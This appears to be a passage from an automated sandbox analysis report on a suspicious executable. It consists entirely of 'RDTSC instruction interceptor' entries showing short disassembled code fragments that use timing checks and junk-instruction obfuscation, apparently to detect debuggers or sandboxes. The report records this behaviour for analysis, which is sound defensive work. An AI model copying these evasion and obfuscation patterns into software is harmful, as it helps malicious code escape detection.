Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369301 second address: 369322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3A9502B600h 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36976B second address: 36976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369B39 second address: 369B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369B3E second address: 369B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jg 00007F3A94CD4078h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369B54 second address: 369B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369B5E second address: 369B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 369B62 second address: 369B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36A157 second address: 36A15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3604AB second address: 3604B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3604B3 second address: 3604B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3604B7 second address: 3604C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3604C0 second address: 3604C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33EC23 second address: 33EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36A53B second address: 36A547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F3A94CD4076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36AC37 second address: 36AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36FAC7 second address: 36FAF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F3A94CD4082h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F3A94CD407Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36FAF3 second address: 36FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36FAF7 second address: 36FB1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e js 00007F3A94CD407Ch 0x00000014 jg 00007F3A94CD4076h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 36E38C second address: 36E3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5F6h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3772F8 second address: 377329 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 jbe 00007F3A94CD4076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3A94CD4087h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F3A94CD4076h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 377329 second address: 37732D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3406C3 second address: 3406CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3406CB second address: 340708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3A9502B5EAh 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A9502B5EFh 0x00000017 push ebx 0x00000018 jne 00007F3A9502B5E6h 0x0000001e jmp 00007F3A9502B5F4h 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376AE0 second address: 376AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376AE4 second address: 376AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376DF3 second address: 376DFD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376DFD second address: 376E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376E09 second address: 376E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376E0D second address: 376E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3A9502B600h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376E3D second address: 376E4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376F90 second address: 376F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376F96 second address: 376F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376F9C second address: 376FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 376FBE second address: 376FD6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3A94CD407Eh 0x00000010 js 00007F3A94CD4076h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3799A7 second address: 3799AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3799AD second address: 3799B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 379C60 second address: 379C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A31A second address: 37A320 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A320 second address: 37A325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A381 second address: 37A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A658 second address: 37A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A9502B5ECh 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A6F3 second address: 37A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A6F8 second address: 37A70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F3A9502B5E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A70D second address: 37A711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A711 second address: 37A717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37A717 second address: 37A725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37AE89 second address: 37AE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37AE8D second address: 37AF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4084h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F3A94CD4083h 0x00000014 mov di, dx 0x00000017 pop edi 0x00000018 movzx edi, ax 0x0000001b push 00000000h 0x0000001d call 00007F3A94CD407Ah 0x00000022 jmp 00007F3A94CD4081h 0x00000027 pop esi 0x00000028 jmp 00007F3A94CD4089h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F3A94CD4078h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F3A94CD4085h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37AF3C second address: 37AF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37DFE7 second address: 37DFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37DFF5 second address: 37E073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1CD2h], edi 0x0000002a push 00000000h 0x0000002c cld 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F3A9502B5E8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov si, dx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F3A9502B5EFh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37E073 second address: 37E078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37E078 second address: 37E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37EB74 second address: 37EC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3A94CD4078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 07CCD72Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F3A94CD4078h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 call 00007F3A94CD407Bh 0x0000004c mov dword ptr [ebp+122D20B7h], esi 0x00000052 pop esi 0x00000053 mov dword ptr [ebp+122D2F63h], ebx 0x00000059 push 00000000h 0x0000005b mov dword ptr [ebp+122D2ED4h], eax 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F3A94CD4087h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37E989 second address: 37E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37EC10 second address: 37EC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 380A38 second address: 380AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3A9502B5E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+12453EBEh], ebx 0x00000015 mov dword ptr [ebp+122D29C3h], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F3A9502B5E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+124553D3h], edi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F3A9502B5E8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 jmp 00007F3A9502B5F8h 0x0000005e jmp 00007F3A9502B5EBh 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F3A9502B5EBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 380AD2 second address: 380AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 380AD8 second address: 380ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37FCFD second address: 37FD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37FD03 second address: 37FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37FD07 second address: 37FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 381598 second address: 38159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 37FD0B second address: 37FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F3A94CD407Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD4089h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38159C second address: 3815A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3815A6 second address: 3815AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3815AC second address: 3815B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3815B0 second address: 3815B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3815B4 second address: 38160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F3A9502B5F1h 0x00000010 jns 00007F3A9502B5E6h 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D1BFBh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3A9502B5E8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jc 00007F3A9502B5E6h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 385120 second address: 385124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 381E9B second address: 381EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 385124 second address: 38512A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38661B second address: 38661F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3857EE second address: 3857F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38661F second address: 386625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3857F4 second address: 3857F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3857F8 second address: 38589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3A9502B5E8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jg 00007F3A9502B5E8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 push dword ptr fs:[00000000h] 0x00000028 movzx edi, cx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2E7Ch], ebx 0x00000038 mov eax, dword ptr [ebp+122D1005h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F3A9502B5E8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D2C82h] 0x0000005e push FFFFFFFFh 0x00000060 add bl, 0000001Ch 0x00000063 nop 0x00000064 pushad 0x00000065 jmp 00007F3A9502B5F7h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3A9502B5F2h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3867E4 second address: 3867F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3867F4 second address: 3867F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3867F8 second address: 38680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jg 00007F3A94CD4076h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38680B second address: 386827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
